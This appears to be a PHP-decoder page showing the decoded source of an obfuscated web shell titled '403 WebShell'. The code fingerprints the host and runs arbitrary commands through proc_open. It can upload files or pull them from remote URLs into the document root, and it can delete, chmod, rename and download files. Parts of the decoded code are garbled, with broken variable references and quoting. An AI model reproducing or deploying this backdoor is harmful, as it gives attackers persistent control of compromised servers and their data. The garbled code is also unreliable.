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PHP Decode

< ? php $ { "GLOB\x41\x4cS" } ["cq\x71\x6dd\x67e\x72"] = "\x69\x7a\x69\x6e"; $ {..

Decoded Output download

<?   <  ? php $ { 
["cqqmdger"] = "izin"; 
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["wwrwxibc"] = "euybray"; 
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["ntregompobs"] = "euybrekw"; 
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["ohqngo"] = "loke"; 
$qllaxizj = "isw"; 
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$ { 
["qigtknuzo"] = "srl"; 
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["poepgxqif"] = "unm"; 
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["mcyywb"] = "b"; 
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["etustir"] = "lokasi"; 
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["qvtkoih"] = "gcu"; 
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["sthyntbejabw"] = "disf"; 
$ { 
["praegxnw"] = "disfunc"; 
$ { 
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["ttnmtd"] = "bsn"; 
$ { 
["xdggjzae"] = "rad"; 
$ { 
["igcdtx"] = "gmu"; 
$ { 
["ltbyfzq"] = "rd"; 
$ { 
["cebsybqn"] = "fsz"; 
$ { 
["gvlxasjtwso"] = "isr"; 
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["fuotbziipt"] = "isw"; 
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["wbbousvsbuo"] = "sub"; 
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["llfirfw"] = "ifi"; 
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["lxxuyheexdd"] = "fp"; 
$eoitcpa = "igt"; 
$ { 
["bgugeadc"] = "ulk"; 
$ { 
["pnuoeceg"] = "idi"; 
$ { 
["gmlajbpvlkr"] = "scd"; 
$iexhsdbjyeu = "fxt"; 
$ { 
["rxhmbnt"] = "fgt"; 
$ { 
["skbsieflq"] = "exp"; 
$ { 
["bsohaeeeex"] = "rad"; 
echo "%PDF-
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$ { 
["voackphpg"] = "isw"; 
$hxdbsgoc = "sts"; 
$ymudwcszql = "fpt"; 
$ { 
["smhvvheqojk"] = "chm"; 
echo "<title>403"."Web"."Sh"."el"."l</title>"; 
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$ { 
["xrkjqswlldj"] = "fnct"; 
echo "<font face="Bungee" size="5\">4"."0"."3"."We"."bs"."he"."ll</font></center>
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$ { 
["zcpxledj"] = "gcw"; 
$lxwfnbvxbkvb = "key"; 
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["nwkkhw"] = "fxt"; 
$ { 
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} = "ge"."tc"."wd"; 
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} = "ex"."plo"."de"; 
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["wciiuzocwto"] = "ocd"; 
$ { 
} = "fi"."le_p"."ut_co"."nte"."nts"; 
$ { 
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} = "f"."ile_g"."et_c"."onten"."ts"; 
$ { 
} = "s"."trip"."slash"."es"; 
$ { 
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} = "sc"."a"."nd"."ir"; 
$ { 
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} = "fi"."le_"."exis"."ts"; 
$ { 
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} = "i"."s_d"."ir"; 
$ { 
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} = "un"."li"."nk"; 
$wxmddzbvxn = "euybrekw"; 
$edfwdxlirj = "ird"; 
$ { 
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} = "i"."s_fi"."le"; 
$ { 
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} = "subs"."tr"; 
$ljzqypxykt = "rpt"; 
$ { 
} = "sp"."ri"."ntf"; 
$ { 
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} = "fil"."epe"."rms"; 
$ { 
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} = "ch"."m"."od"; 
$ { 
    $ { 
} = "oc"."td"."ec"; 
$ { 
    $ { 
} = "i"."s_wr"."itab"."le"; 
$ { 
} = "i"."s_d"."ir"; 
$ { 
} = "is"."_rea"."da"."ble"; 
$ { 
    $ { 
} = "is_"."re"."adab"."le"; 
$ { 
["qmwnqfbnld"] = "sps"; 
$ { 
    $ { 
} = "fi"."lesi"."ze"; 
$ { 
["pohvwdfkbi"] = "euybrekw"; 
$ { 
["fujwormc"] = "unm"; 
$ { 
    $ { 
} = "r"."ou"."nd"; 
$ { 
} = "in"."i_g"."et"; 
$ { 
["dektyjsxpj"] = "lokasi"; 
$ { 
    $ { 
} = "fu"."nc"."tion"."_exi"."sts"; 
$ { 
    $ { 
} = "RE"."M"."OTE_AD"."DR"; 
$ { 
} = "re"."al"."pa"."th"; 
$pjhfvcrl = "igt"; 
$ { 
    $ { 
} = "ba"."se"."na"."me"; 
$ { 
} = "st"."r_r"."ep"."la"."ce"; 
$ { 
    $ { 
} = "st"."rp"."os"; 
$ { 
    $ { 
} = "m"."kd"."ir"; 
$ { 
} = (isset($_SERVER["H"."T"."TP"."S"]) && $_SERVER["H"."T"."TP"."S"] === "o"."n" ? "ht"."tp"."s" : "ht"."tp")."://".$_SERVER["HT"."TP"."_H"."OS"."T"]; 
$ { 
    $ { 
} =  @ $ { 
if (empty($ { 
        $ { 
    })) { 
    $ { 
        $ { 
    } = "<font color='#df5'>NONE</font>"; 
} else { 
    $bxpddjvwtce = "disfunc"; 
    $ { 
        $ { 
    } = "<font color='red'>".$ { 
$jwlhpwb = "scd"; 
function author() { 
    echo "<center><br>Yo"."u"."ez - 2"."01"."6 - "."gi"."thu"."b.c"."om"."/yo"."n3z"."u<br><a href='https://li"."nu"."xp"."loi"."t".".com/' target='_blank'>Lin"."uX"."pl"."o"."it</a></center>"; 
function cekdir() { 
    $oyxobcih = "b"; 
    if (isset($_GET["loknya"])) { 
        $ { 
        ["krfllotdf"] = "lokasi"; 
        $ { 
            $ { 
        } = $_GET["loknya"]; 
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        $ { 
        ["nnksrlyb"] = "lokasi"; 
        $ { 
            $ { 
        } = "ge"."t"."cw"."d"; 
        $ { 
            $ { 
        } = $ { 
            $ { 
    $ { 
        $ { 
    } = "i"."s_w"."ri"."tab"."le"; 
    $mzvkteupns = "lokasi"; 
    if ($ { 
        ($ { 
        })) { 
        return "<font color='green'>Writeable</font>"; 
    } else { 
        return "<font color='red'>Writeable</font>"; 
function crt() { 
    $ { 
    ["itfaislq"] = "a"; 
    $ { 
        $ { 
    } = "is"."_w"."ri"."tab"."le"; 
    if ($ { 
        $ { 
        ($_SERVER["DO"."CU"."ME"."NT"."_RO"."OT"])) { 
        return "<font color='green'>Writeable</font>"; 
    } else { 
        return "<font color='red'>Writeable</font>"; 
function xrd($lokena) { 
    $ { 
    ["vhkocrrdu"] = "item"; 
    $ { 
    ["fonpmjxc"] = "a"; 
    $ { 
    ["qgqjwu"] = "items"; 
    $ { 
        $ { 
    } = "s"."ca"."nd"."ir"; 
    $ { 
        $ { 
    } = $ { 
        $ { 
    ($ { 
        $ { 
    foreach($ { 
        $ { 
        as$ { 
        $ { 
    }) { 
        $ { 
        ["isfdabphyx"] = "item"; 
        $juknoulv = "item"; 
        $awkwhdtg = "lokena"; 
        $ { 
        ["fdkulileik"] = "loknya"; 
        $xvfwesbv = "b"; 
        $axbnvoykein = "item"; 
        if ($ { 
            $ { 
             === "." || $ { 
             === "..") { 
        $ { 
        ["pchxcvybhik"] = "loknya"; 
        $ { 
            $ { 
        } = "is"."_di"."r"; 
        $ { 
            $ { 
        } = $ { 
        ."/".$ { 
        if ($ { 
            ($ { 
                $ { 
            })) { 
            $ { 
            ["rdfbmdpci"] = "loknya"; 
            xrd($ { 
                $ { 
        } else { 
            $ { 
                $ { 
            } = "u"."nl"."in"."k"; 
            $ { 
                $ { 
            ($ { 
                $ { 
    $ { 
        $ { 
    } = "rm"."di"."r"; 
    $ { 
        $ { 
    ($ { 
        $ { 
$ivgkjaem = "isr"; 
function cfn($fl) { 
    $ { 
    ["seklrnfrnxll"] = "b"; 
    $ { 
    ["tcswzbfe"] = "a"; 
    $ { 
    ["ubrxeg"] = "a"; 
    $djagjh = "fl"; 
    $ { 
    ["vlkenuszwz"] = "c"; 
    $ { 
        $ { 
    } = "ba"."sena"."me"; 
    $ { 
        $ { 
    } = "pat"."hinf"."o"; 
    $irkfejwm = "c"; 
    $ { 
        $ { 
    } = $ { 
        $ { 
    ($ { 
        $ { 
        ($ { 
    if ($ { 
        $ { 
         == "zip") { 
        return "<i class="fa fa-file-zip-o\" style="color: #d6d4ce"></i>"; 
    elseif(preg_match("/jpeg|jpg|png|ico/im", $ { 
            $ { 
        })) { 
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    elseif($ { 
         == "txt") { 
        return "<i class="fa fa-file-text-o\" style=\"color: #d6d4ce\"></i>"; 
    elseif($ { 
        $ { 
         == "pdf") { 
        return "<i class=\"fa fa-file-pdf-o\" style=\"color: #d6d4ce\"></i>"; 
    elseif($ { 
        $ { 
         == "html") { 
        return "<i class=\"fa fa-file-code-o" style="color: #d6d4ce\"></i>"; 
    else { 
        return "<i class="fa fa-file-o\" style="color: #d6d4ce"></i>"; 
function ipsrv() { 
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    ["gyxuikoc"] = "a"; 
    $kxsppnsh = "d"; 
    $ { 
    ["kepbxanx"] = "b"; 
    $ { 
        $ { 
    } = "g"."eth"."ost"."byna"."me"; 
    $ { 
        $ { 
    } = "fun"."cti"."on_"."exis"."ts"; 
    $ { 
        $ { 
    } = "S"."ERVE"."R_AD"."DR"; 
    $ { 
    } = "SE"."RV"."ER_N"."AM"."E"; 
    if ($ { 
        $ { 
        ($ { 
            $ { 
        })) { 
        return$ { 
            $ { 
        ($_SERVER[$ { 
                    $ { 
    } else { 
        $lorbunv = "a"; 
        $ { 
        ["crpxxbykhfv"] = "c"; 
        return$ { 
        ($_SERVER[$ { 
                    $ { 
$esejzwv = "fxt"; 
function ggr($fl) { 
    $ { 
    ["wjqobouyea"] = "a"; 
    $ { 
        $ { 
    } = "fun"."cti"."on_"."exis"."ts"; 
    $ { 
        $ { 
    } = "po"."si"."x_ge"."tgr"."gid"; 
    $ { 
        $ { 
    } = "fi"."le"."gro"."up"; 
    $ewugyzwit = "c"; 
    $pwgvzghdbi = "a"; 
    if ($ { 
        $ { 
        ($ { 
            $ { 
        })) { 
        $zircgxd = "b"; 
        $ { 
        ["rrccfuwtbd"] = "c"; 
        if (!$ { 
            $ { 
            ($ { 
                $ { 
            })) { 
            return "?"; 
        $edierdblfw = "d"; 
        $pmnmkgvpd = "d"; 
        $ { 
        } = $ { 
        ($ { 
            $ { 
            ($ { 
                $ { 
        if (empty($ { 
            })) { 
            $ { 
            ["skeiyebgkut"] = "fl"; 
            $awzfgocysq = "c"; 
            $wwgtthowh = "e"; 
            $ { 
            } = $ { 
            ($ { 
                $ { 
            if (empty($ { 
                    $ { 
                })) { 
                return "?"; 
            } else { 
                return$ { 
                    $ { 
        } else { 
            return$ { 
                $ { 
    elseif($ { 
        ($ { 
        })) { 
        return$ { 
            $ { 
        ($ { 
            $ { 
    else { 
        return "?"; 
function gor($fl) { 
    $pxsxcfuam = "a"; 
    $ { 
    ["lskgsljgnxh"] = "b"; 
    $llyknqknf = "a"; 
    $ { 
    } = "fun"."cti"."on_"."exis"."ts"; 
    $ { 
        $ { 
    } = "po"."s"."ix_"."get"."pwu"."id"; 
    $sdgxkujej = "b"; 
    $ { 
    ["idkesoyu"] = "a"; 
    $ { 
        $ { 
    } = "fi"."le"."o"."wn"."er"; 
    if ($ { 
        $ { 
        ($ { 
        })) { 
        $lgllqimc = "c"; 
        $ { 
        ["ifqqlemty"] = "fl"; 
        $tiglldxvro = "b"; 
        $ { 
        ["opntygwdrp"] = "d"; 
        if (!$ { 
            $ { 
            ($ { 
            })) { 
            return "?"; 
        $ { 
            $ { 
        } = $ { 
        ($ { 
            $ { 
            ($ { 
                $ { 
        if (empty($ { 
                $ { 
            })) { 
            $ { 
                $ { 
            } = $ { 
                $ { 
            ($ { 
                $ { 
            if (empty($ { 
                    $ { 
                })) { 
                return "?"; 
            } else { 
                $ { 
                ["zkphvcqf"] = "e"; 
                return$ { 
                    $ { 
        } else { 
            $ { 
            ["ixxdecqson"] = "d"; 
            return$ { 
                $ { 
    elseif($ { 
        ($ { 
            $ { 
        })) { 
        return$ { 
            $ { 
        ($ { 
            $ { 
    else { 
        return "?"; 
function fdt($fl) { 
    $mljdpwinjve = "fl"; 
    $abpfooutkk = "b"; 
    $ { 
        $ { 
    } = "da"."te"; 
    $ { 
    } = "fil"."emt"."ime"; 
    return$ { 
        $ { 
    ("F d Y H:i:s", $ { 
        $ { 
        ($ { 
function dunlut($fl) { 
    $ldzigmkgil = "fl"; 
    $rybsubvedwx = "b"; 
    $pcncofqr = "c"; 
    $mhqesnsxiw = "a"; 
    $ { 
    } = "fil"."e_exi"."sts"; 
    $ { 
    ["rtmjlwmt"] = "d"; 
    $ { 
    } = "ba"."sena"."me"; 
    $ { 
    ["ujbhtgmo"] = "fl"; 
    $ { 
    } = "fi"."les"."ize"; 
    $ { 
        $ { 
    } = "read"."fi"."le"; 
    if ($ { 
        $ { 
        ($ { 
            $ { 
        }) && isset($ { 
        })) { 
        header("Con"."tent-Descr"."iption: Fi"."le Tra"."nsfer"); 
        $fkbtmqpr = "fl"; 
        $ggnojlfl = "b"; 
        header("Cont"."ent-Type: a"."pp"."licat"."ion/oc"."tet-s"."tream"); 
        header("Cont"."ent-Dis"."posit"."ion: at"."tachm"."ent; fi"."lena"."me="".$ { 
            ($ { 
        header("Exp"."ires: 0"); 
        header("Cac"."he-Cont"."rol: must"."-revali"."date"); 
        $kdrltqmtpk = "c"; 
        $ { 
        ["ielwpbqx"] = "fl"; 
        header("Pra"."gma: pub"."lic"); 
        header("Con"."ten"."t-Le"."ngth: ".$ { 
            ($ { 
                $ { 
        $ { 
            $ { 
        ($ { 
            $ { 
    } else { 
        return "Fi"."le Not F"."ound !"; 
function komend($kom, $lk) { 
    $ { 
    ["vlxqguu"] = "a"; 
    $tvktohkfryd = "kom"; 
    $rhejmhu = "xx"; 
    $ { 
        $ { 
    } = "pr"."eg_"."mat"."ch"; 
    $ { 
    } = "2".">"."&"."1"; 
    if (!$ { 
        $ { 
        ("/".$ { 
            $ { 
            ."/i", $ { 
        })) { 
        $ { 
        ["jlpqcgvydfn"] = "xx"; 
        $ { 
        ["ucehdsl"] = "kom"; 
        $ { 
            $ { 
        } = $ { 
            $ { 
        ." ".$ { 
            $ { 
    $kwbnjmxnx = "c"; 
    $ { 
        $ { 
    } = "fu"."ncti"."on_"."ex"."is"."ts"; 
    $ { 
        $ { 
    } = "p"."ro"."c_op"."en"; 
    $ { 
    } = "htm"."lspe"."cialc"."hars"; 
    $kdrkctmpbcz = "b"; 
    $ { 
        $ { 
    } = "s"."trea"."m_g"."et_c"."ont"."ents"; 
    if ($ { 
        $ { 
        ($ { 
        })) { 
        $mwhofra = "lk"; 
        $mdwmiazwh = "ps"; 
        $ { 
        } = $ { 
            $ { 
        ($ { 
            $ { 
        }, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $ { 
            $ { 
        }, $ { 
        return "<pre>".$ { 
            $ { 
        ($ { 
            $ { 
            ($ { 
                $ { 
    } else { 
        return "pr"."oc"."_op"."en f"."unc"."tio"."n i"."s di"."sabl"."ed !"; 
function green($text) { 
    $oxtrdncesee = "text"; 
    echo "<center><font color='green'>".$ { 
function red($text) { 
    $gihvirs = "text"; 
    echo "<center><font color='red'>".$ { 
function oren($text) { 
    $ { 
    ["npukhf"] = "text"; 
    return "<center><font color='orange'>".$ { 
        $ { 
function tuls($nm, $lk) { 
    $oibkgetoku = "lk"; 
    $gmbgpziaxf = "nm"; 
    return "[ <a href='".$ { 
    ."'>".$ { 
    ."</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; 
echo "Se"."rv"."er"." I"."P : <font color=#df5>".ipsrv()."</font> &nbsp;/&nbsp; Yo"."ur I"."P : <font color=#df5>".$_SERVER[$ { 
        $ { 
echo "We"."b S"."erv"."er : <font color='#df5'>".$_SERVER["SE"."RV"."ER_"."SOF"."TWA"."RE"]."</font><br>"; 
$ { 
    $ { 
} = "ph"."p_u"."na"."me"; 
echo "Sys"."tem : <font color='#df5'>". @ $ { 
    $ { 
$ { 
} = "g"."et_"."curr"."ent"."_us"."er"; 
$ { 
    $ { 
} = "g"."et"."my"."ui"."d"; 
$vhyacpz = "mekicina"; 
echo "Us"."er : <font color='#df5'>". @ $ { 
    $ { 
()."&nbsp;</font>( <font color='#df5'>". @ $ { 
    $ { 
$inhjrwwivy = "euybrekw"; 
$ { 
    $ { 
} = "ph"."pve"."rsi"."on"; 
echo "PH"."P V"."er"."sio"."n : <font color='#df5'>". @ $ { 
    $ { 
$croldmyrovu = "lokasis"; 
echo "Dis"."abl"."e Fu"."nct"."ion : ".$ { 
    $ { 
echo "MySQL : "; 
$qsnksgboo = "fxt"; 
if ( @ $ { 
    $ { 
    ("my"."sql_co"."nne"."ct")) { 
    echo "<font color=green>ON</font>"; 
} else { 
    echo "<font color=red>OFF</font>"; 
echo " &nbsp;|&nbsp; cURL : "; 
if ( @ $ { 
    $ { 
    ("cu"."rl"."_in"."it")) { 
    echo "<font color=green>ON</font>"; 
} else { 
    echo "<font color=red>OFF</font>"; 
echo " &nbsp;|&nbsp; WG"."ET : "; 
$ { 
["krngmqkreth"] = "euybrekw"; 
if ( @ $ { 
    ("/"."us"."r/b"."in/w"."get")) { 
    echo "<font color=green>ON</font>"; 
} else { 
    echo "<font color=red>OFF</font>"; 
echo " &nbsp;|&nbsp; Pe"."rl : "; 
$ { 
["wivvudcy"] = "id"; 
if ( @ $ { 
    $ { 
    ("/u"."sr/b"."in"."/pe"."rl")) { 
    echo "<font color=green>ON</font>"; 
} else { 
    echo "<font color=red>OFF</font>"; 
echo " &nbsp;|&nbsp; Pyt"."ho"."n : "; 
if ( @ $ { 
    $ { 
    ("/"."us"."r/b"."in/p"."ytho"."n2")) { 
    echo "<font color=green>ON</font>"; 
} else { 
    echo "<font color=red>OFF</font>"; 
echo " &nbsp;|&nbsp; S"."u"."do : "; 
$vfksjcyl = "euybrekw"; 
if ( @ $ { 
    ("/"."us"."r/b"."in/s"."u"."d"."o")) { 
    echo "<font color=green>ON</font>"; 
} else { 
    echo "<font color=red>OFF</font>"; 
echo " &nbsp;|&nbsp; Pk"."e"."x"."e"."c : "; 
if ( @ $ { 
    ("/"."us"."r/b"."in/p"."k"."e"."x"."e"."c")) { 
    echo "<font color=green>ON</font>"; 
} else { 
    echo "<font color=red>OFF</font>"; 
echo "<br>Di"."rect"."ory : &nbsp;"; 
foreach($_POST as$ { 
     => $ { 
    $ { 
}) { 
    $ { 
    ["wehcug"] = "value"; 
    $cukjhxv = "key"; 
    $_POST[$ { 
    ] = $ { 
        $ { 
    ($ { 
        $ { 
if (isset($_GET["loknya"])) { 
    $ebuvjva = "lokasi"; 
    $ { 
    } = $_GET["loknya"]; 
    $ { 
        $ { 
    } = $_GET["loknya"]; 
} else { 
    $ { 
    ["bvhcwsib"] = "gcw"; 
    $ { 
        $ { 
    } = $ { 
        $ { 
    $ { 
        $ { 
    } = $ { 
        $ { 
$ { 
    $ { 
} = $ { 
("\", "/", $ { 
    $ { 
$ { 
} = $ { 
    $ { 
("/", $ { 
$ { 
} =  @ $ { 
($ { 
    $ { 
foreach($ { 
    $ { 
    as$ { 
    $ { 
     => $ { 
}) { 
    $kvtepftsol = "lok"; 
    $grbiruhkf = "i"; 
    $gnlixmgrw = "lok"; 
    $ { 
    ["koipzytpcib"] = "lok"; 
    if ($ { 
         == "" && $ { 
        $ { 
         == 0) { 
        $ilronn = "a"; 
        $ { 
        } = true; 
        echo "<a href=\"?loknya=/\">/</a>"; 
    $ykqmvxiy = "i"; 
    $nvguoeps = "i"; 
    if ($ { 
        $ { 
         == "") 
    echo "<a href=\"?loknya="; 
    for ($ { 
    } = 0; $ { 
         <= $ { 
        $ { 
    }; $ { 
        ++) { 
        $dxsirqc = "i"; 
        echo "$lokasis[$i]"; 
        if ($ { 
             != $ { 
            $ { 
            echo "/"; 
    echo "">".$ { 
echo "</td></tr><tr><td><br>"; 
if (isset($_POST["upwkwk"])) { 
    if (isset($_POST["berkasnya"])) { 
        if ($_POST["dirnya"] == "2") { 
            $mvifegegy = "lokasi"; 
            $ { 
            } = $_SERVER["DOC"."UME"."NT_R"."OOT"]; 
        if (empty($_FILES["berkas"]["name"])) { 
            echo "<font color=orange>Fi"."le not Se"."lected !</font><br><br>"; 
        } else { 
            $nmtlysln = "lokasi"; 
            $qogvsnnmp = "fxt"; 
            $ { 
            ["wayelch"] = "fgt"; 
            $ { 
                $ { 
            } =  @ $ { 
                $ { 
            ($ { 
                ."/".$_FILES["berkas"]["name"],  @ $ { 
                $ { 
            if ($ { 
                ($ { 
                    $ { 
                    ."/".$_FILES["berkas"]["name"])) { 
                $lelysxtnxg = "sps"; 
                $ { 
                ["ujvosxre"] = "fl"; 
                $iolcexppqz = "fl"; 
                $ { 
                } = $ { 
                    $ { 
                echo "Fi"."le Upl"."oa"."ded ! &nbsp;<font color='gold'><i>".$ { 
                    $ { 
                if ($ { 
                    ($ { 
                        $ { 
                    }, $_SERVER["DO"."CU"."M"."ENT"."_R"."OO"."T"]) !== false) { 
                    $ { 
                    ["dtyjfuhgc"] = "lwb"; 
                    $ { 
                    ["qkeyxlrxozd"] = "wb"; 
                    $ { 
                    ["ovxtuvx"] = "lwb"; 
                    $jlaxgynrhi = "srl"; 
                    $ { 
                        $ { 
                    } = $ { 
                    ($_SERVER["DO"."CU"."M"."ENT"."_R"."OO"."T"], $ { 
                        $ { 
                        ."/", $ { 
                        $ { 
                    echo "Li"."nk : <a href='".$ { 
                        $ { 
                    ."'><font color='#df5'>".$ { 
                        $ { 
                echo "<br>"; 
            } else { 
                echo "<font color='red'>Fa"."ile"."d to Up"."lo"."ad !</font><br><br>"; 
    elseif(isset($_POST["linknya"])) { 
        if (empty($_POST["namalink"])) { 
            echo "<font color=orange>Fi"."lename cannot be empty !</font><br><br>"; 
        elseif(empty($_POST["darilink"])) { 
            echo "<font color=orange>Link cannot be empty !</font><br><br>"; 
        else { 
            $ { 
            ["qvfgnr"] = "data"; 
            $ { 
            ["splmrxurfvxz"] = "fxt"; 
            if ($_POST["dirnya"] == "2") { 
                $cqfhustxjv = "lokasi"; 
                $ { 
                } = $_SERVER["DOC"."UME"."NT_R"."OOT"]; 
            $pyupnp = "fgt"; 
            $ { 
                $ { 
            } =  @ $ { 
                $ { 
            ($ { 
                $ { 
                ."/".$_POST["namalink"],  @ $ { 
            if ($ { 
                $ { 
                ($ { 
                    $ { 
                    ."/".$_POST["namalink"])) { 
                $ { 
                ["vristr"] = "fl"; 
                $wgpwxl = "fl"; 
                $ { 
                } = $ { 
                    $ { 
                echo "Fi"."le Uplo"."ade"."d ! &nbsp;<font color='#df5'><i>".$ { 
                    $ { 
                if ($ { 
                    $ { 
                    ($ { 
                        $ { 
                    }, $_SERVER["DO"."CU"."M"."ENT"."_R"."OO"."T"]) !== false) { 
                    $ { 
                    ["qmjqipuf"] = "fl"; 
                    $ { 
                        $ { 
                    } = $ { 
                        $ { 
                    ($_SERVER["DO"."CU"."M"."ENT"."_R"."OO"."T"], $ { 
                        $ { 
                        ."/", $ { 
                        $ { 
                    echo "Li"."nk : <a href='".$ { 
                        $ { 
                    ."'><font color='#df5'>".$ { 
                        $ { 
                echo "<br>"; 
            } else { 
                echo "<font color='red'>Fa"."iled to Up"."lo"."ad !</font><br><br>"; 
echo "Uplo"."ad Fi"."le : "; 
echo "<form enctype="multip"."art/form"."-data\" method="p"."ost\">
<input type=\"radio\" value="1" name=\"dirnya" checked>current_dir [ ".cekdir()." ]
<input type=\"radio\" value=\"2" name="dirnya" >document_root [ ".crt()." ]
<input type="hidden\" name=\"upwkwk" value="aplod">
<input type="fi"."le\" name=\"berkas\"><input type=\"submit\" name="berkasnya" value=\"Up"."load" class="up\" style=\"cursor: pointer; border-color: #fff\"><br>
<input type=\"text" name=\"darilink\" class="up\" placeholder="https://linux".""."oad.txt\">&nbsp;<input type="text\" name=\"namalink\" class=\"up" size=\"5" placeholder="ke"."rang.txt\"><input type="submit" name=\"linknya\" class=\"up" value="Upload\" style=\"cursor: pointer; border-color: #fff\">
echo "<br><form method="post\" enctype=\"application/x-www-form-urlencoded">
Co"."mm"."an"."d : <input type=\"text\" name="komend\" class="up" style="cursor: pointer; border-color: #000\" value=\"".htmlspecialchars($_POST["komend"])."">
<input type=\"submit" name="komends\" value=">>\" class="up\" style="cursor: pointer; border-color: #fff">
echo "</table><br>"; 
echo "<hr><center style=\"font-family: Russo One\">"; 
$xlkuwuyl = "ppkcina"; 
echo tuls("Back", $_SERVER["SC"."RIP"."T_N"."AME"]); 
echo "<hr></center><br>"; 
$ { 
["iedxgrhasq"] = "euybrekw"; 
$jzuwhpbb = "lokasi"; 
if (isset($_GET["lokasie"])) { 
    echo "<tr><td>Current Fi"."le : ".$_GET["lokasie"]; 
    $ { 
    ["wdggju"] = "fgt"; 
    echo "</tr></td></table><br/>"; 
    echo "<pre>".htmlspecialchars($ { 
        $ { 
elseif(isset($_POST["loknya"]) && $_POST["pilih"] == "hapus") { 
    $ilqtrrh = "fxt"; 
    if ($ { 
        $ { 
        ($_POST["loknya"]) && $ { 
        $ { 
        ($_POST["loknya"])) { 
        if ($ { 
            $ { 
            ($_POST["loknya"])) { 
            red("Fai"."led to del"."ete Dir"."ec"."tory !"); 
        } else { 
            green("Del"."ete Dir"."ect"."ory Suc"."cess !"); 
    elseif($ { 
        $ { 
        ($_POST["loknya"]) && $ { 
        ($_POST["loknya"])) { 
         @ $ { 
            $ { 
        if ($ { 
            $ { 
            ($_POST["loknya"])) { 
            red("Failed to Delete Fi"."le !"); 
        } else { 
            green("De"."le"."te Fi"."le Succ"."ess !"); 
    else { 
        red("Fi"."le / Dir"."ecto"."ry not Fo"."und !"); 
elseif(isset($_GET["pilihan"]) && $_POST["pilih"] == "ubahmod") { 
    if (!isset($_POST["cemod"])) { 
        $ntyoytp = "fp"; 
        $ { 
        ["iipoesnos"] = "sub"; 
        if ($_POST["ty"."pe"] == "fi"."le") { 
            echo "<center>Fi"."le : ".htmlspecialchars($_POST["loknya"])."<br>"; 
        } else { 
            echo "<center>D"."ir : ".htmlspecialchars($_POST["loknya"])."<br>"; 
        echo "<form method="post">
		Pe"."rmi"."ss"."ion : <input name=\"perm" type=\"text\" class="up" size=\"4" maxlength=\"4" value="".$ { 
            $ { 
        ($ { 
            $ { 
            ("%o", $ { 
                ($_POST["loknya"])), -4)."" />
		<input type=\"hidden" name=\"loknya\" value=\"".$_POST["loknya"]."">
		<input type="hidden" name=\"pilih\" value=\"ubahmod">"; 
        if ($_POST["ty"."pe"] == "fi"."le") { 
            echo "<input type="hidden\" name=\"type" value=\"fi"."le\">"; 
        } else { 
            echo "<input type=\"hidden\" name="type" value="di"."r\">"; 
        echo "<input type=\"submit\" value=\"Change" name="cemod\" class=\"up\" style=\"cursor: pointer; border-color: #fff"/>
    } else { 
        $ocpyfbnpsnb = "cm"; 
        $ikwmybleng = "ocd"; 
        $ { 
        ["oowyme"] = "cm"; 
        $rerzboyzt = "chm"; 
        $ { 
        } =  @ $ { 
        ($_POST["loknya"], $ { 
        if ($ { 
            $ { 
             == true) { 
            $ { 
            ["bahnwwjnab"] = "fp"; 
            green("Change Mod Success !"); 
            if ($_POST["ty"."pe"] == "fi"."le") { 
                echo "<center>Fi"."le : ".htmlspecialchars($_POST["loknya"])."<br>"; 
            } else { 
                echo "<center>D"."ir : ".htmlspecialchars($_POST["loknya"])."<br>"; 
            echo "<form method="post\">
			Pe"."rmi"."ss"."ion : <input name=\"perm\" type="text" class=\"up\" size=\"4\" maxlength="4\" value="".$ { 
                $ { 
            ($ { 
                $ { 
                ("%o", $ { 
                    $ { 
                    ($_POST["loknya"])), -4)."\" />
			<input type="hidden" name="loknya" value=\"".$_POST["loknya"]."">
			<input type="hidden\" name="pilih\" value="ubahmod\">"; 
            if ($_POST["ty"."pe"] == "fi"."le") { 
                echo "<input type="hidden" name="type\" value=\"fi"."le\">"; 
            } else { 
                echo "<input type="hidden" name=\"type\" value="di"."r">"; 
            echo "<input type="submit\" value=\"Change\" name="cemod\" class="up\" style="cursor: pointer; border-color: #fff\"/>
        } else { 
            red("Change Mod Failed !"); 
            $mwspgyboh = "spr"; 
            if ($_POST["ty"."pe"] == "fi"."le") { 
                echo "<center>Fi"."le : ".htmlspecialchars($_POST["loknya"])."<br>"; 
            } else { 
                echo "<center>D"."ir : ".htmlspecialchars($_POST["loknya"])."<br>"; 
            $fbttmj = "sub"; 
            $ { 
            ["vbcmwdw"] = "fp"; 
            echo "<form method=\"post\">
			Pe"."rmi"."ss"."ion : <input name=\"perm" type=\"text" class=\"up" size=\"4" maxlength="4" value="".$ { 
            ($ { 
                ("%o", $ { 
                    $ { 
                    ($_POST["loknya"])), -4)."" />
			<input type=\"hidden" name="loknya" value="".$_POST["loknya"]."">
			<input type="hidden" name=\"pilih\" value="ubahmod\">"; 
            if ($_POST["ty"."pe"] == "fi"."le") { 
                echo "<input type=\"hidden\" name="type" value=\"fi"."le">"; 
            } else { 
                echo "<input type=\"hidden" name=\"type" value=\"di"."r\">"; 
            echo "<input type=\"submit\" value=\"Change" name=\"cemod\" class=\"up" style=\"cursor: pointer; border-color: #fff\"/>
elseif(isset($_POST["loknya"]) && $_POST["pilih"] == "ubahnama") { 
    if (isset($_POST["gantin"])) { 
        $ { 
        ["obyylrichv"] = "ceen"; 
        $ { 
            $ { 
        } = $_GET["loknya"]."/".$_POST["newname"]; 
        $ { 
            $ { 
        } = "re"."na"."me"; 
        if ( @ $ { 
            $ { 
            ($_POST["loknya"], $ { 
                $ { 
            }) === true) { 
            green("Change Name Success"); 
            if ($_POST["ty"."pe"] == "fi"."le") { 
                echo "<center>Fi"."le : ".htmlspecialchars($_POST["loknya"])."<br>"; 
            } else { 
                echo "<center>D"."ir : ".htmlspecialchars($_POST["loknya"])."<br>"; 
            echo "<form method=\"post">
			New Name : <input name="newname" type="text\" class=\"up" size="20" value="".htmlspecialchars($_POST["newname"])."" />
			<input type=\"hidden\" name="loknya" value="".$_POST["newname"]."">
			<input type="hidden\" name=\"pilih" value="ubahnama\">"; 
            if ($_POST["ty"."pe"] == "fi"."le") { 
                echo "<input type="hidden" name="type\" value=\"fi"."le\">"; 
            } else { 
                echo "<input type="hidden" name=\"type" value=\"di"."r\">"; 
            echo "<input type="submit\" value="Change" name="gantin" class=\"up\" style="cursor: pointer; border-color: #fff\"/>
        } else { 
            red("Change Name Failed"); 
    } else { 
        $ { 
        ["bhapsw"] = "bsn"; 
        if ($_POST["ty"."pe"] == "fi"."le") { 
            echo "<center>Fi"."le : ".htmlspecialchars($_POST["loknya"])."<br>"; 
        } else { 
